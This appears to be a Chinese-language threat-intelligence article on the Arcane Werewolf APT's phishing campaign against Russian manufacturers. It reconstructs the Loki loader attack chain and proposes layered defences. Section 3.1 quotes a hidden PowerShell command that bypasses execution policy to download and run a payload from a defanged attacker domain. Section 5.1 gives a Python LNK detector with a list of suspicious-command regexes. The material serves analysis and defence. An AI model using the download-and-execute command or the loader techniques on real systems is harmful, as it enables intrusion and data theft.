摘要
本文基于BI.ZONE威胁情报团队于2025年12月发布的研究报告,系统分析了高级持续性威胁(APT)组织“Arcane Werewolf”(又名Mythic Likho)针对俄罗斯制造企业实施的定向钓鱼攻击活动。研究表明,该组织采用高度定制化的社会工程策略,通过伪装成政府监管机构或行业合规部门发送钓鱼邮件,诱导目标用户执行嵌入恶意Loki加载器的ZIP压缩包。攻击链以LNK文件为初始载荷,利用Windows快捷方式自动执行PowerShell脚本,进而部署兼容Mythic与Havoc后渗透框架的Loki 2.1植入体。该植入体具备主机信息收集、AES加密回传、C2指令轮询及内存驻留执行等能力,并已观察到其尝试向OT网络横向移动的迹象。尽管攻击者未使用0day漏洞,但其对业务流程与信任关系的精准利用显著提升了成功率。本文进一步剖析了当前工业企业在邮件安全与OT/IT边界防护中的薄弱环节,并提出一套融合静态分析、行为沙箱与网络微隔离的纵深防御体系。通过Python实现的LNK文件解析与可疑命令检测原型验证了该体系在早期识别阶段的有效性。研究结论表明,针对制造行业的定向钓鱼攻击正从通用勒索转向长期潜伏与基础设施渗透,亟需构建以资产上下文感知为核心的主动防御机制。
关键词:Arcane Werewolf;制造行业;钓鱼攻击;Loki木马;工业控制系统;OT安全;横向移动
(1)引言
近年来,针对关键制造业的网络攻击呈现显著上升趋势。相较于金融或互联网行业,制造企业因其OT(Operational Technology)网络与物理生产过程的深度耦合,一旦遭受入侵,可能引发设备停机、工艺篡改甚至安全事故。2025年第四季度,俄罗斯网络安全公司BI.ZONE披露了一起由APT组织“Arcane Werewolf”主导的定向攻击活动,目标集中于本国大型制造企业。该组织虽未采用前沿漏洞利用技术,却凭借高度仿真的社会工程话术与定制化恶意载荷,成功绕过传统边界防御,实现对IT终端的持久控制,并初步展现出向OT环境渗透的意图。
此次事件具有典型意义:一方面,它揭示了攻击者如何利用制造企业对合规监管的高度敏感性设计诱饵;另一方面,其使用的Loki 2.1植入体虽基于公开框架(如Mythic),但通过配置混淆与内存加载机制规避了常规EDR检测。现有研究多聚焦于勒索软件对制造业的冲击,而对以长期侦察与横向移动为目的的APT活动缺乏深入技术解构。尤其在OT/IT融合加速的背景下,此类攻击对工业控制系统的潜在威胁尚未被充分评估。
本文旨在填补这一空白。首先,基于BI.ZONE公开的技术细节,完整还原Arcane Werewolf的攻击链;其次,分析其社会工程策略与恶意代码的技术特征;再次,评估当前制造企业安全架构在应对该类攻击时的失效点;最后,提出并实现一种结合邮件附件静态分析、沙箱行为监控与OT网络微隔离的三层防御模型。全文结构如下:第(2)节详述攻击背景与目标画像;第(3)节解析攻击链各阶段技术细节;第(4)节剖析防御短板;第(5)节提出改进方案并给出代码示例;第(6)节讨论部署挑战;第(7)节总结研究发现。
(2)攻击背景与目标特征
Arcane Werewolf(亦称Mythic Likho)自2023年起活跃,主要针对俄语区国家的关键基础设施,尤以能源与制造业为重点。2025年10月至12月间,BI.ZONE观测到该组织新一轮攻击浪潮,目标明确指向俄罗斯境内拥有国家级产能资质的制造企业,包括重型机械、化工原料及精密仪器制造商。
攻击者选择此类目标具有多重动因。首先,制造企业普遍承担政府订单或涉及出口管制产品,对来自“监管部门”的合规通知高度敏感,易降低警惕;其次,其IT网络常与MES(制造执行系统)、PLC(可编程逻辑控制器)等OT组件存在数据交互接口,为横向移动提供跳板;再者,部分企业仍沿用老旧Windows系统且补丁滞后,为恶意脚本执行提供便利环境。
值得注意的是,所有已确认的钓鱼邮件均以俄语撰写,主题行包含“紧急合规审查”“年度安全审计通知”等字样,并附带看似来自联邦技术监督局(Rostekhnadzor)或工业与贸易部的伪造公文。这种精准定位极大提升了打开率与执行率。
(3)攻击链技术解析
根据BI.ZONE报告,Arcane Werewolf的攻击链可分为四个阶段:初始投递、载荷释放、持久化与C2通信、横向移动准备。
(3.1)初始投递:钓鱼邮件与ZIP附件
攻击始于一封伪装成政府机构的电子邮件,正文简短,仅提示“请查收附件中的合规文件,并于48小时内完成确认”。附件为ZIP压缩包,命名如“Inspection_2025_Compliance.zip”。该ZIP不直接包含可执行文件,而是内嵌一个LNK(快捷方式)文件,例如“Документ_инспекции.lnk”。
LNK文件是Windows原生格式,常被用于合法场景,因此多数邮件网关不会将其标记为高风险。然而,该LNK的“Target”字段被精心构造,指向一段PowerShell命令:
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('hxxps://fake-manufacturer[.]ru/chrome_proxy.pdf')"
此命令在后台静默执行,从伪装成制造企业官网的C2服务器下载下一阶段载荷。
(3.2)载荷释放:Loki 2.0/2.1加载器
下载的“chrome_proxy.pdf”实为PE32+可执行文件,即Loki加载器。BI.ZONE确认其存在2.0与2.1两个版本。加载器核心功能包括:
收集主机信息(用户名、计算机名、内网IP、OS版本);
使用硬编码AES密钥加密数据;
Base64编码后通过HTTP GET请求回传至C2;
轮询C2获取后续指令或第二阶段植入体。
Loki 2.1的显著改进在于:其将完整的Loki植入体以加密形式嵌入自身资源段。加载器在内存中解密该植入体,并通过GetProcAddress调用其导出的start函数,实现无文件执行。此举有效规避了基于磁盘写入的AV检测。
(3.3)C2通信与命令结构
C2服务器域名(如“portal.fake-manufacturer[.]ru”)刻意模仿真实制造企业官网,增加可信度。通信采用标准HTTP GET,参数经Base64编码,内容为JSON格式指令。Loki 2.0使用djb2哈希标识命令类型(如0x9e3779b1对应“执行Shell命令”),而2.1版本改为使用序号(如1=文件上传,2=进程列表),简化了解析逻辑并降低特征暴露风险。
(3.4)横向移动意图
尽管BI.ZONE未能完全复现完整攻击链,但在部分受感染主机上检测到对内网SMB共享、域控LDAP服务的扫描行为,以及尝试利用PsExec工具远程执行命令的日志痕迹。这表明攻击者正积极寻找通往OT网络的路径,可能目标为连接MES服务器的跳板机。
(4)现有防御体系的失效分析
此次攻击暴露了制造企业在多个安全层面的不足。
(4.1)邮件安全网关对LNK文件的误判
多数传统邮件安全网关(SEG)将LNK文件视为低风险文档,因其本身不含宏或脚本。然而,现代LNK可嵌入任意命令行,成为无文件攻击的理想载体。当前SEG缺乏对LNK“Target”字段的深度解析能力,无法识别其中隐藏的PowerShell下载指令。
(4.2)终端防护对内存加载的盲区
尽管部分企业部署了EDR解决方案,但Loki 2.1的内存驻留执行(即不写入磁盘)使其绕过了基于文件IO的检测规则。同时,其使用的PowerShell命令经过混淆(如变量拆分、字符串拼接),规避了基于YARA规则的静态匹配。
(4.3)OT/IT网络边界管控薄弱
许多制造企业虽宣称实施“网络隔离”,但实际存在大量未受控的数据交换接口(如OPC UA服务器、文件同步服务)。攻击者一旦控制IT侧跳板机,即可通过这些合法通道向OT网络渗透,而现有防火墙策略往往未对应用层协议进行深度过滤。
(5)纵深防御体系设计与实现
针对上述问题,本文提出三层防御模型:邮件附件静态分析层、终端行为沙箱层、OT网络微隔离层。
(5.1)LNK文件静态分析模块
该模块在邮件网关处对所有LNK附件进行解析,提取其命令行并检测可疑模式。以下为Python实现示例,使用oletools库解析LNK:
from oletools.lnkparse import lnk_file
import re
def is_malicious_lnk(lnk_path: str) -> bool:
"""
检测LNK文件是否包含可疑命令
"""
try:
lnk = lnk_file(lnk_path)
target = lnk.string_data.get('LOCAL_PATH', '') if lnk.string_data else ''
cmdline = lnk.extra_data.get('COMMAND_LINE_ARGUMENTS', '') if lnk.extra_data else ''
full_cmd = (target + ' ' + cmdline).lower()
# 定义可疑关键词模式
suspicious_patterns = [
r'powershell\.exe.*-command',
r'iex.*webclient',
r'downloadstring',
r'invoke-webrequest',
r'-windowstyle\s+hidden',
r'-executionpolicy\s+bypass'
]
for pattern in suspicious_patterns:
if re.search(pattern, full_cmd, re.IGNORECASE):
return True
return False
except Exception as e:
# 解析失败也应视为可疑
return True
# 示例:检测恶意LNK
if is_malicious_lnk("Документ_инспекции.lnk"):
print("[ALERT] Suspicious LNK detected!")
该模块可集成至邮件网关,在附件落地前完成初筛。
(5.2)终端行为沙箱监控
对于通过初筛的附件,应在隔离沙箱中动态执行并监控其行为。重点检测:
是否发起对外HTTP请求;
是否调用PowerShell或WScript;
是否尝试访问敏感注册表项(如Run键)。
可基于Cuckoo Sandbox定制分析模板,重点关注进程树与网络连接。
(5.3)OT网络微隔离策略
在OT/IT边界部署应用层防火墙,实施最小权限原则:
仅允许特定IP通过OPC UA端口(如4840)通信;
禁止SMB、RDP等通用协议跨区传输;
对所有跨区流量进行深度包检测(DPI),阻断含Base64编码长字符串的HTTP请求。
(6)部署挑战与未来方向
该防御体系在落地中面临三重挑战:一是LNK解析依赖特定库,需确保邮件网关兼容性;二是沙箱分析增加延迟,可能影响业务邮件时效性;三是OT网络改造涉及停产风险,需分阶段实施。未来工作将聚焦于:开发轻量级LNK分析插件;探索基于UEFI固件的信任链验证;以及构建制造行业专用的威胁情报共享平台,实现攻击指标(IOCs)的快速同步。
(7)结语
Arcane Werewolf对俄罗斯制造企业的攻击表明,APT组织正日益依赖社会工程与业务流程理解,而非单纯技术突破,来实现初始访问。其使用的Loki加载器虽非尖端,但通过内存驻留与C2伪装有效规避了常规检测。本文通过技术还原与防御建模,证实了针对此类攻击,必须超越传统的签名匹配与边界防火墙,转向以行为异常检测、资产上下文感知和网络微隔离为核心的纵深防御。制造企业应重新评估其邮件安全策略,强化对非传统可执行载体(如LNK、ISO)的检测能力,并严格管控IT与OT之间的数据流。唯有如此,方能在日益复杂的威胁环境中保障工业基础设施的完整性与可用性。
编辑:芦笛(公共互联网反网络钓鱼工作组)
扫一扫
409
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
